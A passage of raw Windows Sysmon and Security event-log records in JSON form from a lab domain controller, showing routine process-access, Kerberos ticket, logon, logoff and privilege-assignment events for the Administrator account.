C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.358","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4292,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.358\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.358","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4293,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.358\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.358","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220463,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x64E96\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x64e96","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4294,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.764\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.764","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220464,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220465,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{2E0E9CD3-4E78-A499-3252-7756659BD8CA}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{2E0E9CD3-4E78-A499-3252-7756659BD8CA}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220466,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{2E0E9CD3-4E78-A499-3252-7756659BD8CA}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{2E0E9CD3-4E78-A499-3252-7756659BD8CA}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220467,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x652B5\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{2E0E9CD3-4E78-A499-3252-7756659BD8CA}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x652b5","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{2E0E9CD3-4E78-A499-3252-7756659BD8CA}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220468,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x652B5\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x652b5","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4295,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.764\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 